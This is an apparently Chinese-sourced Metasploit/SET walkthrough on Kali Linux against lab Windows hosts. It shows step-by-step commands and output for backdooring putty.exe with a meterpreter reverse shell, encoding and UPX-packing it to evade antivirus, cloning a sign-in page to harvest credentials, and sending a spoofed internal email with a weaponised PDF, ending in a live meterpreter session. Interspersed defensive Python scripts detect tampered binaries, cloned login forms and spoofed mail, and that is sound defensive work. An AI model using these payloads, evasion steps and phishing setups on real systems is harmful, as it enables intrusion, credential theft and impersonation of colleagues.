This post records, in detail, the process of learning to use Metasploit on Kali Linux 2017.1:
- Disguised trojan
- Website phishing
- Email phishing
### 1. Disguised trojan

Generate the attack payload program for the trojan. There is no msfpayload command any more; it has been replaced by msfvenom, which integrates msfpayload and msfencode. Another payload generator is Veil-Evasion (project page: https://github.com/Veil-Framework/Veil-Evasion), which is better at evading antivirus. The target host to be attacked is a Windows system, so the payload must be able to connect back to the listening host and must support post-exploitation functionality.

Reference: http://blog.csdn.net/lzhd24/article/details/50664342

```
root@attacker:~# msfvenom -l | grep windows | grep reverse_tcp | grep meterpreter
windows/meterpreter/reverse_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
windows/meterpreter/reverse_tcp_allports Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)
windows/meterpreter/reverse_tcp_dns Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
windows/meterpreter/reverse_tcp_rc4 Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
windows/meterpreter/reverse_tcp_rc4_dns Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
windows/meterpreter/reverse_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker with UUID Support
windows/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter shell
windows/patchupmeterpreter/reverse_tcp Inject the meterpreter server DLL (staged). Connect back to the attacker
windows/patchupmeterpreter/reverse_tcp_allports Inject the meterpreter server DLL (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)
windows/patchupmeterpreter/reverse_tcp_dns Inject the meterpreter server DLL (staged). Connect back to the attacker
windows/patchupmeterpreter/reverse_tcp_rc4 Inject the meterpreter server DLL (staged). Connect back to the attacker
windows/patchupmeterpreter/reverse_tcp_rc4_dns Inject the meterpreter server DLL (staged). Connect back to the attacker
windows/patchupmeterpreter/reverse_tcp_uuid Inject the meterpreter server DLL (staged). Connect back to the attacker with UUID Support
windows/x64/meterpreter/reverse_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker (Windows x64)
windows/x64/meterpreter/reverse_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker with UUID Support (Windows x64)
windows/x64/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter shell
```
Use the first one, windows/meterpreter/reverse_tcp:

```
root@attacker:~# msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Options:
-p, --payload <payload> Payload to use. Specify a '-' or stdin to use custom payloads
--payload-options List the payload's standard options
-l, --list [type] List a module type. Options are: payloads, encoders, nops, all
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
-f, --format <format> Output format (use --help-formats for a list)
--help-formats List available formats
-e, --encoder <encoder> The encoder to use
-a, --arch <arch> The architecture to use
--platform <platform> The platform of the payload
--help-platforms List available platforms
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-b, --bad-chars <list> The list of characters to avoid example: '\x00\xff'
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the template behavior and inject the payload as a new thread
-o, --out <path> Save the payload
-v, --var-name <name> Specify a custom variable name to use for certain output formats
--smallest Generate the smallest possible payload
-h, --help Show this message
```

A first test:

```
root@attacker:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444 -f exe -o payload.exe
root@attacker:~# ll payload.exe
-rw-r--r-- 1 root root 73802 Sep 22 00:10 payload.exe
```
Inject the payload into the putty program:

```
root@attacker:~# ll putty_0367.exe
-rw-r--r-- 1 root root 531368 9月 22 00:17 putty_0367.exe
root@attacker:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444 -a x86 --platform windows -e x86/shikata_ga_nai -i 3 -x putty_0367.exe -f exe -o putty_evil.exe
Found 1 compatible encoders
Attempting to encode payload with 3 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai chosen with final size 414
Payload size: 414 bytes
Final size of exe file: 531368 bytes
Saved as: putty_evil.exe
root@attacker:~# ll putty_*
-rw-r--r-- 1 root root 531368 9月 22 00:17 putty_0367.exe
-rw-r--r-- 1 root root 531368 9月 22 00:21 putty_evil.exe
```
After the file has been planted on the Windows host, set up the handler:

```
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf exploit(handler) > set LPORT 80
LPORT => 80
msf exploit(handler) > exploit
```
With this listener running, open the infected program on the Windows side; it will, however, also be intercepted by the antivirus software.

Pack it to evade detection:

```
root@attacker:~# upx -6 -o putty_backdoor.exe putty_evil.exe
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2013
UPX 3.91 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 30th 2013
File size Ratio Format Name
-------------------- ------ ----------- -----------
531368 -> 397736 74.85% win32/pe putty_backdoor.exe
Packed 1 file.
```
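The defender's view of the two steps above, as an added example that is not part of the original post: putty_evil.exe came out with exactly the same size as the clean putty_0367.exe, so file size tells an integrity check nothing, while a pinned SHA-256 of the known-good build does; and UPX leaves its section names (UPX0/UPX1) in the PE section table, which is an easy heuristic for "this vendor binary has been repacked". The script parses only the PE headers with the standard library; every byte it inspects is constructed in memory (`build_fake_pe` is a helper of this example, not a real executable), and `CLEAN`, `BACKDOORED` and `PACKED` are stand-ins for the three files in the walkthrough.

```python
# Added example (not from the original post): integrity and packer check for a
# binary that may have been backdoored with "msfvenom -x" and packed with UPX.
import hashlib
import struct

UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2"}


def pe_section_names(data: bytes) -> list:
    """Return the section names of a PE image by parsing only its headers."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                      # COFF file header follows "PE\0\0"
    (num_sections,) = struct.unpack_from("<H", data, coff + 2)
    (opt_hdr_size,) = struct.unpack_from("<H", data, coff + 16)
    table = coff + 20 + opt_hdr_size         # section table follows the optional header
    names = []
    for i in range(num_sections):
        raw = data[table + 40 * i:table + 40 * i + 8]
        if len(raw) < 8:
            raise ValueError("truncated section table")
        names.append(raw.rstrip(b"\0"))
    return names


def assess(candidate: bytes, known_good_sha256: str, known_good_size: int) -> dict:
    """Compare a file with the pinned hash/size of the vendor build and look
    for packer section names; returns the raw signals plus human reasons."""
    digest = hashlib.sha256(candidate).hexdigest()
    upx = sorted(n.decode() for n in pe_section_names(candidate) if n in UPX_SECTION_NAMES)
    reasons = []
    if digest != known_good_sha256:
        reasons.append("SHA-256 differs from the pinned known-good build")
    if upx:
        reasons.append("UPX section names present: " + ", ".join(upx))
    return {
        "sha256": digest,
        "hash_matches_known_good": digest == known_good_sha256,
        "same_size_as_known_good": len(candidate) == known_good_size,
        "upx_sections": upx,
        "reasons": reasons,
    }


def build_fake_pe(section_names, body: bytes = b"") -> bytes:
    """Constructed, minimal PE-shaped blob (DOS header, PE signature, COFF
    header, zero-filled PE32 optional header, one 40-byte header per section,
    then the body). Not loadable; it only exercises the header parser."""
    e_lfanew = 0x40
    dos = bytearray(b"MZ" + b"\0" * (e_lfanew - 2))
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt_size = 224
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, opt_size, 0x0102)
    sections = b"".join(n.ljust(8, b"\0") + b"\0" * 32 for n in section_names)
    return bytes(dos) + b"PE\0\0" + coff + b"\0" * opt_size + sections + body


# Constructed stand-ins for the three files in the walkthrough.
CLEAN = build_fake_pe([b".text", b".rdata", b".data", b".rsrc"], body=b"A" * 256)
CLEAN_SHA256 = hashlib.sha256(CLEAN).hexdigest()
# Same length as CLEAN with one body byte changed, as the -x template run kept the size.
BACKDOORED = CLEAN[:-16] + b"B" + CLEAN[-15:]
# UPX-style section layout, what "upx -6 -o putty_backdoor.exe" leaves behind.
PACKED = build_fake_pe([b"UPX0", b"UPX1", b".rsrc"], body=b"C" * 128)

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN), ("backdoored", BACKDOORED), ("packed", PACKED)):
        print(label, assess(blob, CLEAN_SHA256, len(CLEAN)))
```

On a real file, read it with `open(path, "rb")` and pin the SHA-256 the vendor publishes for that release. The section-name test is only a heuristic: UPX sections can be renamed and some legitimate software ships packed, so the hash comparison (or an Authenticode signature check) is the signal to act on.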
### 2. Website phishing

Reference: http://www.cnblogs.com/youcanch/articles/5671274.html

```
root@attacker:~# setoolkit
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules
99) Return back to the main menu.
set> 2
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method
99) Return to Main Menu
set:webattack>3
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:10.10.10.128
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://10.10.10.129/signin.html
```
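A check from the receiving side, as an added example that is not part of the original post: the Credential Harvester clones a sign-in page and rewrites its form so that the submitted credentials are POSTed back to the harvester host. Given the URL a page was actually fetched from and its HTML, the checker below lists every form that collects a password and flags the signals such a clone tends to show: the page or the form target is a bare IP literal, the form posts to a host other than the one the page came from, or the credentials would travel over plain http. Both HTML documents are constructed; the clone reuses the lab address from the walkthrough and `login.example.com` is a placeholder for the genuine site.

```python
# Added example (not from the original post): flag login forms that look like
# a credential-harvester clone. Standard library only.
from html.parser import HTMLParser
from ipaddress import ip_address
from urllib.parse import urljoin, urlsplit


class FormCollector(HTMLParser):
    """Collect each <form> with its action and whether it has a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def _is_ip_literal(host: str) -> bool:
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def analyse_login_page(page_url: str, html: str) -> list:
    """Return one finding per password-collecting form: the resolved action
    URL and the list of reasons it looks like a cloned page (empty if none)."""
    parser = FormCollector()
    parser.feed(html)
    page = urlsplit(page_url)
    page_host = (page.hostname or "").lower()
    findings = []
    for form in parser.forms:
        if not form["password"]:
            continue
        target = urlsplit(urljoin(page_url, form["action"]))  # relative actions resolve against the page
        target_host = (target.hostname or "").lower()
        reasons = []
        if _is_ip_literal(page_host):
            reasons.append("page served from a bare IP address")
        if _is_ip_literal(target_host):
            reasons.append("credentials posted to a bare IP address")
        if target_host != page_host:
            reasons.append("form posts to a different host than the page origin")
        if target.scheme != "https":
            reasons.append("credentials would be sent over plain http")
        findings.append({"action": target.geturl(), "reasons": reasons})
    return findings


# Constructed: the genuine sign-in page, served over https from its own host.
GENUINE_URL = "https://login.example.com/signin.html"
GENUINE_HTML = """<html><body>
<form method="post" action="/session">
  <input name="user"><input type="password" name="pass"><button>Sign in</button>
</form></body></html>"""

# Constructed: a harvester clone served from the SET host and posting back to it.
CLONE_URL = "http://10.10.10.128/signin.html"
CLONE_HTML = """<html><body>
<form method="post" action="http://10.10.10.128/">
  <input name="user"><input type="password" name="pass"><button>Sign in</button>
</form>
<form action="/search"><input name="q"></form>
</body></html>"""

if __name__ == "__main__":
    print("genuine:", analyse_login_page(GENUINE_URL, GENUINE_HTML))
    print("clone:  ", analyse_login_page(CLONE_URL, CLONE_HTML))
```

The same function can be pointed at the HTML a URL-scanning mail gateway or a browser extension has already fetched; the reasons list is deliberately plain text so it can be shown to the user or attached to an alert as-is.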
### 3. Email phishing

```
root@attacker:~# setoolkit
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules
99) Return back to the main menu.
set> 1
1) Perform a Mass Email Attack
2) Create a FileFormat Payload
3) Create a Social-Engineering Template
99) Return to Main Menu
set:phishing>1
1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2) SET Custom Written Document UNC LM SMB Capture Attack
3) MS15-100 Microsoft Windows Media Center MCL Vulnerability
4) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)
5) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
7) Adobe Flash Player "Button" Remote Code Execution
8) Adobe CoolType SING Table "uniqueName" Overflow
9) Adobe Flash Player "newfunction" Invalid Pointer Use
10) Adobe Collab.collectEmailInfo Buffer Overflow
11) Adobe Collab.getIcon Buffer Overflow
12) Adobe JBIG2Decode Memory Corruption Exploit
13) Adobe PDF Embedded EXE Social Engineering
14) Adobe util.printf() Buffer Overflow
15) Custom EXE to VBA (sent via RAR) (RAR required)
16) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
17) Adobe PDF Embedded EXE Social Engineering (NOJS)
18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
19) Apple QuickTime PICT PnSize Buffer Overflow
20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
21) Adobe Reader u3D Memory Corruption Vulnerability
22) MSCOMCTL ActiveX Buffer Overflow (ms12-027)
set:payloads>8
1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker
2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker
4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter
6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system
7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
set:payloads>2
set:payloads> Port to connect back on [443]:443
[*] All good! The directories were created.
[-] Generating fileformat exploit...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.
set:phishing>2
set:phishing> New filename:Dvssc_ABC_Project_Status.pdf
```

```
root@attacker:~# cd /root/
root@attacker:~# cd .set/
root@attacker:~/.set# ls
Dvssc_ABC_Project_Status.pdf payload.options template.pdf template.rc
root@attacker:~/.set# ll
总用量 104
-rw-r--r-- 1 root root 46863 9月 25 09:45 Dvssc_ABC_Project_Status.pdf
-rw-r--r-- 1 root root 48 9月 25 09:43 payload.options
-rw-r--r-- 1 root root 46863 9月 25 09:43 template.pdf
-rw-r--r-- 1 root root 150 9月 25 09:43 template.rc
```
View the contents:

```
root@attacker:~/.set# xpdf Dvssc_ABC_Project_Status.pdf
```

Then tidy it up with Adobe Acrobat Pro.

```
set:phishing>1
Do you want to use a predefined template or craft
a one time email template.
1. Pre-Defined Template
2. One-Time Use Email Template
set:phishing>2
set:phishing> Subject of the email:Ki wang
set:phishing> Send the message as html or plain? 'h' or 'p' [p]:p
set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:Please review the ABC project status report
Next line of the body: wo are behind the school^Cset:phishing> Send email to:wangdongpeng@dvssc.com
1. Use a gmail Account for your email attack.
2. Use your own server or open relay
set:phishing>2
set:phishing> From address (ex: moo@example.com):liming@dvssc.com
set:phishing> The FROM NAME user will see:yourname
set:phishing> Username for open-relay [blank]:yourpasswd
Password for open-relay [blank]:
set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com):mail.163.com
set:phishing> Port number for the SMTP server [25]:
set:phishing> Flag this message/s as high priority? [yes|no]:yes
```
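What the message assembled above looks like to a mail gateway, as an added example that is not part of the original post: the From address claims an internal colleague (liming@dvssc.com), but the first MTA that accepted the message is an outside provider (mail.163.com), the message is flagged high priority, and it carries a PDF attachment. The triage function below extracts those three signals from the raw message with the standard `email` package. The .eml is constructed: the addresses, subject and host names reuse the values typed into SET in the walkthrough, 192.0.2.10 is a documentation-range placeholder IP, the queue ids are placeholders, and the attachment body is a few bytes of base64 standing in for a real PDF.

```python
# Added example (not from the original post): header triage for a spear-phish
# sent through an external SMTP relay under an internal From address.
import email
import re
from email import policy
from email.utils import parseaddr

DOCUMENT_EXTENSIONS = (".pdf", ".doc", ".docx", ".rtf", ".xls", ".xlsx", ".zip", ".rar")

# Constructed sample message; Received headers are listed newest first, as an MTA writes them.
SAMPLE_EML = b"""\
Return-Path: <liming@dvssc.com>
Received: from mail.163.com (mail.163.com [192.0.2.10])
    by mx.dvssc.com (Postfix) with ESMTPS id PLACEHOLDER1
    for <wangdongpeng@dvssc.com>; Mon, 25 Sep 2017 09:50:01 -0400
Received: from [10.10.10.128] (unknown [10.10.10.128])
    by mail.163.com (Postfix) with ESMTP id PLACEHOLDER2;
    Mon, 25 Sep 2017 09:49:58 -0400
From: yourname <liming@dvssc.com>
To: wangdongpeng@dvssc.com
Subject: Ki wang
X-Priority: 1
Importance: High
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="us-ascii"

Please review the ABC project status report
--b1
Content-Type: application/pdf; name="Dvssc_ABC_Project_Status.pdf"
Content-Disposition: attachment; filename="Dvssc_ABC_Project_Status.pdf"
Content-Transfer-Encoding: base64

JVBERi0xLjQK
--b1--
"""


def _domain_of(addr: str) -> str:
    return parseaddr(addr)[1].rpartition("@")[2].lower()


def originating_mta(msg) -> str:
    """Host in the 'by' clause of the earliest Received hop: the first server
    that accepted the message from the sending client."""
    hops = msg.get_all("Received") or []
    if not hops:
        return ""
    match = re.search(r"\bby\s+([A-Za-z0-9.-]+)", str(hops[-1]))
    return match.group(1).lower() if match else ""


def triage(raw: bytes) -> dict:
    """Return the signals a gateway would score, plus readable reasons."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    from_domain = _domain_of(str(msg.get("From", "")))
    mta = originating_mta(msg)
    same_org = mta == from_domain or mta.endswith("." + from_domain)
    priority = (str(msg.get("X-Priority", "")).strip().startswith("1")
                or str(msg.get("Importance", "")).strip().lower() == "high")
    attachments = [p.get_filename() for p in msg.iter_attachments() if p.get_filename()]
    documents = [a for a in attachments if a.lower().endswith(DOCUMENT_EXTENSIONS)]
    reasons = []
    if from_domain and mta and not same_org:
        reasons.append(f"From claims {from_domain} but the first hop was accepted by {mta}")
    if priority:
        reasons.append("message flagged high priority")
    if documents:
        reasons.append("document attachment(s) to detonate or strip: " + ", ".join(documents))
    return {
        "from_domain": from_domain,
        "originating_mta": mta,
        "mta_matches_from_domain": same_org,
        "high_priority": priority,
        "attachments": attachments,
        "reasons": reasons,
    }


if __name__ == "__main__":
    for line in triage(SAMPLE_EML)["reasons"]:
        print("-", line)
```

The first signal is the decisive one for this scenario: mail from your own domain that did not originate on your own (or your provider's) MTA is exactly what SPF and DMARC exist to reject at the border, and the Received chain is what lets you confirm it after the fact. The attachment signal is not a verdict on its own; it selects which messages go to sandbox detonation.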
When the file is opened on the XP machine:

```
msf exploit(handler) >
[*] Sending stage (956991 bytes) to 10.10.10.254
[*] Meterpreter session 1 opened (10.10.10.128:443 -> 10.10.10.254:1037) at 2017-09-25 10:16:52 -0400
sessions -i 1
[*] Starting interaction with 1...
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x86 0
240 436 ICQLite.exe x86 0 DH-CA8822AB9589\Administrator C:\Program Files\ICQLite\ICQLite.exe
388 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
436 1320 explorer.exe x86 0 DH-CA8822AB9589\Administrator C:\WINDOWS\Explorer.EXE
640 388 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
664 388 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
708 664 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
720 664 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
876 708 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
892 708 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
968 436 msmsgs.exe x86 0 DH-CA8822AB9589\Administrator C:\Program Files\Messenger\msmsgs.exe
972 708 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1092 708 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1148 708 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1192 436 ctfmon.exe x86 0 DH-CA8822AB9589\Administrator C:\WINDOWS\system32\ctfmon.exe
1204 708 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1276 436 vmtoolsd.exe x86 0 DH-CA8822AB9589\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1380 708 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
1428 708 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1576 708 HistorySvr.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\KingView\HistorySvr.exe
1588 708 inetinfo.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\inetsrv\inetinfo.exe
1676 708 sntlkeyssrvr.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Common Files\SafeNet Sentinel\Sentinel Keys Server\sntlkeyssrvr.exe
1796 1092 wscntfy.exe x86 0 DH-CA8822AB9589\Administrator C:\WINDOWS\system32\wscntfy.exe
1936 708 spnsrvnt.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe
1984 708 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
2648 436 AcroRd32.exe x86 0 DH-CA8822AB9589\Administrator C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe
meterpreter > migrate 436
[*] Migrating from 2648 to 436...
[*] Migration completed successfully.
meterpreter >
```